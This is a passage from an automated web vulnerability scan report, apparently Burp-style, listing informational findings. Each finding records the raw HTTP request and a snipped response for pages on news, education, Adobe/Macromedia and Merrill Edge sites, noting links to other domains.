<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428900" pcg="" id="lnk_JPMCStock"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428802" pcg="" id="lnk_help_family">Finding Ways to Help Families Keep their Homes</a>
...[SNIP]...
">Chase offered more than 568,000 mortgage modifications to struggling homeowners in 2009. Learn more about our progress implementing Chase's and the government's mortgage modification programs. ..... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428802" pcg="" id="lnk_help_family">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=428802" pcg="" id="lnk_help_family"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=426317" pcg="" id="lnk_TWF">&quot;The Way Forward&quot; Holiday Reading List Launches</a>
...[SNIP]...
ass="news_description">J.P. Morgan today announced its third annual holiday reading list aimed at presenting stories centered on community and giving back that will inspire individuals worldwide. .... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=426317" pcg="" id="lnk_TWF">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/press/releasedetail.cfm?ReleaseID=426317" pcg="" id="lnk_TWF"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
<div class="news_title"><a class="nhd_link" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=424728" pcg="" id="lnk_bloomberg_CEOJamie">Mayor Bloomberg and CEO Jamie Dimon Announce $1 Million Donation</a>
...[SNIP]...
<div class="news_description">Mayor Bloomberg and JP Morgan Chase CEO Jamie Dimon Announce $1 Million Donation to Central Park Conservancy to Restore Storm-Ravaged Areas....... <a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=424728 pcg="" id="lnk_bloomberg_CEOJamie"">More</a>
...[SNIP]...
<div class="news_type"><a class="more" target="_blank" href="http://investor.shareholder.com/jpmorganchase/releasedetail.cfm?ReleaseID=424728" pcg="" id="lnk_bloomberg_CEOJamie"><img title="article" alt="article" src="/corporate/includes/images/article.gif" />
...[SNIP]...
</script>
<script type="text/javascript" src="https://chaseonline.chase.com/js/Reporting.js"></script>
...[SNIP]...

16.128. http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.jpost.com
Path:   /ArtsAndCulture/FoodAndWine/Article.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /ArtsAndCulture/FoodAndWine/Article.aspx?id=203979 HTTP/1.1
Host: www.jpost.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:49 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: ASP.NET_SessionId=lnetycrs52hjwi45jufkaq55; path=/; HttpOnly
Content-Type: text/html; charset=utf-8
Content-Length: 108706
Accept-Ranges: bytes
Cache-Control: private, max-age=420
Age: 0
Expires: Thu, 03 Feb 2011 01:23:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head id="ctl00_He
...[SNIP]...
<!-- Google DFP_SB START-->
<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<![endif]-->

<script type="text/javascript" src="http://213.8.137.51/erate/ErateReport.js"></script>
...[SNIP]...
<!-- GA End -->

<script type='text/javascript' src='http://partner.googleadservices.com/gampad/google_service.js'>
</script>
...[SNIP]...
<li><a href="http://www.facebook.com/pages/Jpostcom-Front-Page-Updates-The-Jerusalem-Post/245989161941">
Facebook</a>
...[SNIP]...
<li><a href="http://twitter.com/Jerusalem_Post">Twitter</a>
...[SNIP]...
<li><a href="http://homezeus.tanagraltd.com/shmuel/jpost/Classifieds/Classifieds300111.pdf" target="_blank">Classifieds</a>
...[SNIP]...
<li><a href="http://www.virtualjerusalem.com/livekotel/newkotelcam/virtualjerusalem/index.php?affid=24"
target="_blank">
JPost Kotel Cam</a>
...[SNIP]...
<li class="last"><a href="http://www.kolboalert.com/jpostalert.php" target="_blank">
JPost Alert</a>
...[SNIP]...
<a href='http://www.jpost.com/landedpages/hebrew.aspx' title='JPost Learn Hebrew' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPost--learn-hebrew.png' alt='JPost Learn Hebrew' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.jpostlite.co.il/' title='............ ............' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/jpost-learn-english.png' alt='............ ............' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.groopbuy.co.il/eng/deals/' title='GroopBuy' target='_blank'><img src='http://homezeus.tanagraltd.com/shmuel/JpostStaticBanners/LeftSideROS/daily-deal.png' alt='GroopBuy' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=SHHAXX&sType=2&URL=http://www.nbn.org.il' title='Nefesh Be'Nefesh' target='_blank'><img src='http://homezeus.tanagraltd.com/shmuel/JpostStaticBanners/LeftSideROS/Jpost-aliya.png' alt='Nefesh Be'Nefesh' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=WM2MCO&sType=2&URL=http://new.futuresimchas.com/' title='Future Simchas' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/StaticBanners/Jan11/JPost-dating1.png' alt='Future Simchas' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.passovervacations.com/' title='Passover Vacatation' target='_blank'><img src='http://homezeus.tanagraltd.com/ofer/JPostStaticBanners/JPost-passover.png' alt='Passover Vacatation' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.leket.org' title='Feed Israel' target='_blank'><img src='http://homezeus.tanagraltd.com/ofer/JPostStaticBanners/JPost-Feed-Israel.png' alt='Feed Israel' border='0' /></a>
...[SNIP]...
<a href='http://www.jpost.com/GreenIsrael/Home.aspx' title='Green Israel' target='_blank'><img src='http://homezeus.tanagraltd.com/ofer/JPostStaticBanners/jpost-green-israel.png' alt='Green Israel' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=D41LB4&sType=2&URL=http://www.jpost.com/newsletter/newsletterregistration.aspx' title='JPost Newsletter' target='_blank'><img src='http://homezeus.tanagraltd.com/shmuel/JpostStaticBanners/LeftSideROS/JPost-newslatter.png' alt='JPost Newsletter' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=RSCDT5&sType=2&URL=http://kolboalert.com/jpostalert.php' title='Kolbo Alert' target='_blank'><img src='http://homezeus.tanagraltd.com/shmuel/JpostStaticBanners/LeftSideROS/JPost-alert.png' alt='Kolbo Alert' border='0' /></a>
...[SNIP]...
<span style="font-style: italic"><a href="http://www.barcelonabites.com/" target="_blank">Johanna Bailey</a>
...[SNIP]...
</span><a href="http://www.barcelonabites.com/" target="_blank">http://www.barcelonabites.com</a>
...[SNIP]...
<!--[ Block Spacer End ]-->
<a target="_blank" href="http://213.8.137.51/Erate/LinkTo.asp?sTool=NR3F7I&sType=2&URL=http://www.jpost.com/newsletter/newsletterregistration.aspx">
<span style="font-family: Arial; font-size: 14px;">
...[SNIP]...
<div class="jp-section jp-section-rate">
<iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&amp;layout=button_count&amp;show_faces=true&amp;width=150&amp;action=recommend&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>
<a href='http://twitter.com/share' class='twitter-share-button' data-count='horizontal' data-via='Jerusalem_Post'>Tweet</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
...[SNIP]...
<li class="last"><a class="a2a_dd jp-small-menu-share" href="http://www.addtoany.com/share_save">
Share</a>
...[SNIP]...
</script>

<script type="text/javascript" src="http://static.addtoany.com/menu/page.js"></script>
...[SNIP]...
<!--[ Block Spacer End ]-->
<a href='http://twitter.com/share' class='twitter-share-button' data-count='none' data-via='Jerusalem_Post'>Tweet</a><script type='text/javascript' src='http://platform.twitter.com/widgets.js'></script>
&nbsp;&nbsp;&nbsp;
<iframe src=http://www.facebook.com/plugins/like.php?href=http://www.jpost.com/ArtsAndCulture/FoodAndWine/Article.aspx?id=203979&amp;layout=button_count&amp;show_faces=false&amp;width=100&amp;action=like&amp;colorscheme=light&amp;height=21" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:150px; height:21px;" allowTransparency="true"></iframe>
...[SNIP]...
<div>
<iframe id="Bytec" style="display: inline-block;" frameborder="0" marginheight="0"
marginwidth="0" src="http://www.inisrael-travel.com/jpost/" height="210px">
</iframe>
...[SNIP]...
<a href='https://members.jpost.com/Login.aspx' title='Jpost Premium' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/PREMIUM.png' alt='Jpost Premium' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=YGWPPN&sType=2&URL=http://www.bankhapoalim.com/?refferer=Jpost&subject=hp' title='Bank Hapoalim' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPost--Banking.png' alt='Bank Hapoalim' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=KUZA3T&sType=2&URL=http://www.hertz.co.il/en/HomePage/.aspx' title='JPost Car Rental' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPost--Car-Rentals.png' alt='JPost Car Rental' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.israelhotels.org/index2.cfm' title='JPost Hotels' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPost--Hotels.png' alt='JPost Hotels' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=K3AEK5&sType=2&URL=https://www.afmda.org/afmdapublic/index.aspx' title='AFMDA' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPOST-SALUTES-MDA.png' alt='AFMDA' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.virtualjerusalem.com/livekotel/newkotelcam/virtualjerusalem/index.php?affid=24' title='JPost kotel Camera' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPOST-KOTEL-CAM.png' alt='JPost kotel Camera' border='0' /></a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=NGENKE&sType=2&URL=http://www.jpost.com/LandedPages/JPToolbar.aspx' title='JPost Toolbar' target='_blank'><img src='http://i.total-media.net/jp/tmc/2009/Jpost/JpostStaticBanners/HP/JPOST-TOOLBAR.png' alt='JPost Toolbar' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.meirpanim.org/tracking.php?id=355' title='JPost Donations' target='_blank'><img src='http://homezeus.tanagraltd.com/ofer/JPostStaticBanners/Jpost-donations120.png' alt='JPost Donations' border='0' /></a>
...[SNIP]...
</span>
<a href='http://www.cleopatraschoice.com/dead-sea-salt.html' title='' class='AdsLinks1' target='_blank'>Dead Sea Salt</a><br /><a href='http://www.cleopatraschoice.com/dead-sea-salt.html' title='' class='AdsLinks2' target='_blank'>Shop Dead Sea Bath Salts online. Coupon "JPOST" for 10% off!</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=QWYJZJ&sType=2&URL=http://123abc.go2cloud.org/SHA' title='' class='AdsLinks1' target='_blank'>Dental Tourism To Israel</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=QWYJZJ&sType=2&URL=http://123abc.go2cloud.org/SHA' title='' class='AdsLinks2' target='_blank'>You won't be able to stop Smiling :)</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=3WMT6V&sType=2&URL=http://www.nbn.org.il/applications/guided-aliyah.html' title='Nefesh Guided Aliyah' class='AdsLinks1' target='_blank'>Nefesh B'Nefesh Guided Aliyah</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=3WMT6V&sType=2&URL=http://www.nbn.org.il/applications/guided-aliyah.html' title='Nefesh Guided Aliyah' class='AdsLinks2' target='_blank'>Already living in Israel? Enjoy the Benefits of Aliyah!</a>
...[SNIP]...
</span>
<a href='http://www.meirpanim.org/tracking.php?id=319' title='Meir Panim' class='AdsLinks1' target='_blank'>The Dollar is DOWN</a><br /><a href='http://www.meirpanim.org/tracking.php?id=319' title='Meir Panim' class='AdsLinks2' target='_blank'>Poverty is UP <br>
...[SNIP]...
</span>
<a href='http://eteacherhebrew.com/landing-page/learn-hebrew-online-general-1?cid=2620' title='eteacher' class='AdsLinks1' target='_blank'>Learn Hebrew with eTeacher</a><br /><a href='http://eteacherhebrew.com/landing-page/learn-hebrew-online-general-1?cid=2620' title='eteacher' class='AdsLinks2' target='_blank'>Learn to read, speak & write Hebrew with teachers from Israel</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=31VE4J&sType=2&URL=http://www.groopbuy.co.il/?utm_source=JPost&utm_medium=Banner&utm_campaign=JPost' title='' class='AdsLinks1' target='_blank'>Daily Deals For Up To 90% Off</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=31VE4J&sType=2&URL=http://www.groopbuy.co.il/?utm_source=JPost&utm_medium=Banner&utm_campaign=JPost' title='' class='AdsLinks2' target='_blank'>On Spas, Restaurants & More Activities</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=P8MI65&sType=2&URL=http://www.ulpanaviv.com' title='Ulpan Aviv' class='AdsLinks1' target='_blank'>Learn Hebrew in 10 days</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=P8MI65&sType=2&URL=http://www.ulpanaviv.com' title='Ulpan Aviv' class='AdsLinks2' target='_blank'>10days One-to-One personalized Hebrew course in the heart of Jerusalem</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=2TQX2E&sType=2&URL=http://www.bankhapoalim.com/?refferer=Jpost&subject=hp' title='' class='AdsLinks1' target='_blank'>Bank Hapoalim</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=2TQX2E&sType=2&URL=http://www.bankhapoalim.com/?refferer=Jpost&subject=hp' title='' class='AdsLinks2' target='_blank'>Israeli's number one bank</a>
...[SNIP]...
</span>
<a href='http://www.jpostlite.co.il/' title='Jerusalem Post Lite' class='AdsLinks1' target='_blank'>Jerusalem Post Lite</a><br /><a href='http://www.jpostlite.co.il/' title='Jerusalem Post Lite' class='AdsLinks2' target='_blank'>Light Edition of the Jerusalem Post for English improvement</a>
...[SNIP]...
</span>
<a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=YOWBNR&sType=2&URL=http://www.hertz.co.il/en/HomePage/.aspx' title='Hertz Car Rental' class='AdsLinks1' target='_blank'>Hertz Car Rental</a><br /><a href='http://213.8.137.51/Erate/LinkTo.asp?sTool=YOWBNR&sType=2&URL=http://www.hertz.co.il/en/HomePage/.aspx' title='Hertz Car Rental' class='AdsLinks2' target='_blank'>Our prices will surprise you!</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.jpostlite.co.il/" target="_blank">Jerusalem Post Lite</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.shlomo.co.il/new/en/car-rental-israel" target="_blank">Car Rental Israel</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.danhotels.com/Luxury-Jerusalem-Hotel" target="_blank">Jerusalem Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.bankhapoalim.com/?refferer=Jpost&amp;subject=hp" target="_blank">Poalim Online</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.israelhotels.org/index2.cfm" target="_blank">Israel Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.hosting-review.com/" target="_blank">Web Hosting Providers</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.breitbart.com/" target="_blank">BreitBart.com</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.abcfundraising.com/" target="_blank">Fundraising Ideas</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.4prom.com/" target="_blank">Prom dresses & gowns</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.ayalatours.co.il" target="_blank">Israel travel</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.arzaworld.com" target="_blank">Israel tours</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.israelhotels.org/hotels_all.cfm?LevelID=20" target="_blank">Dead Sea Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.israelhotels.org/hotels_all.cfm?LevelID=7" target="_blank">Tel Aviv Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.israelhotels.org/hotels_all.cfm?LevelID=31" target="_blank">Holy Land Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.israelhotels.org/hotels_all.cfm?LevelID=31" target="_blank">Holy City Hotels</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://bestwebhostingsreviews.com" target="_blank">Website Hosting</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.promgirl.net" target="_blank">Promgirl.net</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.jpostlite.co.il/" target="_blank">Learn English</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://kolboalert.com/jpostalert.php" target="_blank">JPost Alert</a>
...[SNIP]...
<td class="jp-grid-footerlinks-lev2"><a href="http://www.virtualjerusalem.com/livekotel/newkotelcam/virtualjerusalem/index.php?affid=24" target="_blank">JPost Kotel Cam</a>
...[SNIP]...
<span style="float: right; padding-right: 31px;"><a style="text-decoration: none;
font-family: Arial; color: #4DACB3; font-size: 11px;" href="http://www.pulseem.co.il"
target="_blank">
<span style="color: Black;">
...[SNIP]...
</form>

<script language="javascript" src="http://i.total-media.net/jp/dc.js" type="text/javascript"></script>

<script src='http://cdn.wibiya.com/Loaders/Loader_233701.js' type='text/javascript'></script>
...[SNIP]...
<!-- start crazzy egg code-->

<script type="text/javascript" src="http://dnn506yrbagrg.cloudfront.net/pages/scripts/0010/9774.js"> </script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://resources.infolinks.com/js/infolinks_main.js"></script>
...[SNIP]...

16.129. http://www.learningsolutions.com.hk/index.php  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.learningsolutions.com.hk
Path:   /index.php

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /index.php?option=com_content&task=view&id=7&Itemid=13 HTTP/1.1
Host: www.learningsolutions.com.hk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 01:16:51 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.7a mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: f6f411d73f2e572e53afd5afb059105f=-; path=/
Set-Cookie: lang=deleted; expires=Wed, 03-Feb-2010 01:16:51 GMT; path=/
Set-Cookie: mbfcookie=deleted; expires=Wed, 03-Feb-2010 01:16:51 GMT; path=/
Set-Cookie: mbfcookie[lang]=en; expires=Fri, 04-Feb-2011 01:16:52 GMT; path=/
Last-Modified: Thu, 03 Feb 2011 01:16:52 GMT
Connection: close
Content-Type: text/html
Content-Length: 35985


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml">

<head>

<title>Learning Solutio
...[SNIP]...
<p style="font-family: Arial">All IP Boards sold in Hong Kong come with Easiteach&trade; Starter software. This allows for access to sites such as <a href="http://www.learningalive.co.uk/t_resources_results.aspx?prod=137&amp;type=2">http://www.learningalive.co.uk/t_resources_results.aspx?prod=137&amp;type=2</a>
...[SNIP]...
<font color="#666666" face="Verdana">
<a href="http://www.itexpertsnet.com"><font color="#679EBC">
...[SNIP]...

16.130. http://www.macromedia.com/shockwave/download/index.cgi  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.macromedia.com
Path:   /shockwave/download/index.cgi

Issue detail

The page was loaded from a URL containing a query string:The response contains the following link to another domain:

Request

GET /shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash HTTP/1.1
Host: www.macromedia.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 301 Moved Permanently
Date: Wed, 02 Feb 2011 22:19:30 GMT
Server: Apache
Location: http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash
Content-Length: 288
Connection: close
Content-Type: text/html; charset=iso-8859-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.adobe.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash">here</a>
...[SNIP]...

16.131. http://www.merrilledge.com/m/pages/self-directed-investing.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/self-directed-investing.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /m/pages/self-directed-investing.aspx?src_cd=BAC1 HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=TTRYeDozQXwblI0nweSwQsHn6YD83l/Wt+YaF2zImEo1mWQBoNly8HeYwgZsS4awvbcpjNe2eNZpZBaxRoS8YQ/Igr71+0Sv/LUScHcwbUa9PxOErj30kWntU80umPjf6F4WSk8IOen2ZmG+YEGgKcwO7VvKgyn6qUkmBsBI5STUxuATTf1EoDvnPbZKShcAbP2iIknprdwdg3NasKubdOIDe+bHeKqn6YSAxX0NWpQGo4bmbcturymF8O8L9DAzKhnVaNZS1P5nX31iQlrMKZDqQzIG5uZFOX5S14d9VIVyGILAQkFn0whCRkshJiN3I7GY6ytUSF6IL6Wr/uqTjojtVcw1zbVckQak9qtxOwsZBepdkPPPA5UQdaRCYuhKJl8Gg8XjNS8nkTAgMHzzKZcY3lu1cMoJxiLJMw4sE05XIbxgSf6LeOOIdeZP5zbCLdHFzTHFd2etur5mFaDb0x1OH+AA+kXdDH0DZci9eewq/LYcH7pMmI2z5OzOfIUxBmeoLgG2iZzPdyHNilmWgCOJ6pYjXE8sFcW/JobTAHJsI+3K+Ao6jxMsQb7+a9PKjYuvtl9xfWzRntrbcxU2T/oT2NvVXXrc2HM48mliCUIGnsJPi8U6IIQslQYiyidS; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=569d98b44c684ca18f4afb8d67e04991; domain=.merilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 99482


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<span><a class="bookmark" id="BankOfAmerica" title="BankOfAmerica" href="https://www.bankofamerica.com/BorneoHomepageOptInAction.do" target="_blank" name="BankOfAmerica" alt="Bank of America" pxname="BankOfAmerica"><img width="115" height="14" border="0" alt="Bank of America logo" src="/Publish/Content/image/jpeg/GWMOL/logoBOA1.jpeg" key="Image_BOAlogo_Image8"/>
...[SNIP]...
<span><a class="bookmark" id="UtilLinkLogin" title="UtilLinkLogin" href="http://olui2.fs.ml.com/login/login.aspx?sgt=3" name="UtilLinkLogin" pxname="UtilLinkLogin">Merrill Edge Login</a>
...[SNIP]...
<div class="paddingBottom_30px">


<a href="https://olui2.fs.ml.com/OAO1/OpenAccountA.aspx"><img src="/Publish/Content/image/jpeg/GWMOL/banner_invest_own.jpeg" class="bannerWidth bannerHeight" border="0" alt="Welcome to Merrill Edge self-directed investing">
...[SNIP]...
<DIV><a href="https://olui2.fs.ml.com/OAO1/OpenAccountA.aspx" target="_blank" class="btnMajor" name="OpenSDAcct" id="OpenSDAcct" ><span pxname=OpenSDAcct>
...[SNIP]...
<DIV class=paddingBottom_10px><a href="http://www.ml.com/index.asp?id=7695_69068" target="blank" name="PrvcySecrty" id="PrvcySecrty" >Privacy &amp; Security</a>
...[SNIP]...
</A>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_8425_8016_7296#sec_order_execution" target="blank" name="RteExcns" id="RteExcns" >Routing &amp; Executions</a>
...[SNIP]...
</a>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_8425_8016_7296" target="blank" name="LegalInfo" id="LegalInfo" ><span pxname=LegalInfo>
...[SNIP]...
</a>&#160;|&#160;<a href="http://www.ml.com/index.asp?id=7695_17469_14179" target="blank" name="BizCntnty" id="BizCntnty" >Business Continuity</a>
...[SNIP]...
<DIV class="paddingBottom_10px txtBold">MLPF&amp;S is a registered broker-dealer, Member <A href="http://sipc.org/">Securities Investor Protection Corporation (SIPC)</A>
...[SNIP]...
<!-- Begin Core Metrics Tag: Please do not remove--><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/v40/eluminate.js"></script><script language="javascript" type="text/javascript" src="//www.bankofamerica.com/coremetrics/cmdatatagutils.js"></script>
...[SNIP]...
<noscript><iframe src="https://fls.doubleclick.net/activityi;src=1359940;type=merri346;cat=selfd830;ord=1;num=1?" width="1" height="1" frameborder="0"></iframe>
...[SNIP]...

16.132. http://www.merrilledge.com/m/pages/zero-dollar-trades.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/zero-dollar-trades.aspx

Issue detail

The page was loaded from a URL containing a query string:The response contains the following links to other domains:

Request

GET /m/pages/zero-dollar-trades.aspx?src_cd=SDMST1&cm_sp=BAI-SD-_-DDT-_-BHP-C2f-Service_gwim-024_hi2_direct-v4_arq031i4.gif HTTP/1.1
Host: www.merrilledge.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 02 Feb 2011 22:19:31 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
